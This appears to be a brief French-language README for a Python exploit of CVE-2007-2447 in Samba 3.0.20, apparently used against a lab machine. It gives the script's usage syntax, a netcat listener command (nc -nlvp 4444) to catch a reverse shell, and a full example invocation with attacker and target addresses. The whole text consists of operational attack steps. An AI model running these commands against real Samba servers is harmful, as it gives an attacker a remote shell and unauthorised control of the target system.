
Samba 3.0.20 Exploit CVE-2007-2447
Exploit CVE-2007-2447 pour Samba 3.0.20
python3 smb3.0.20_exp.py -lh [localhost] -lp [local port] -t [target]
Créer un écouteur Netcat
nc -nlvp 4444
Exécuter le script
python3 smb3.0.20_exp.py -lh 10.10.16.18 -lp 4444 -t 10.10.10.3
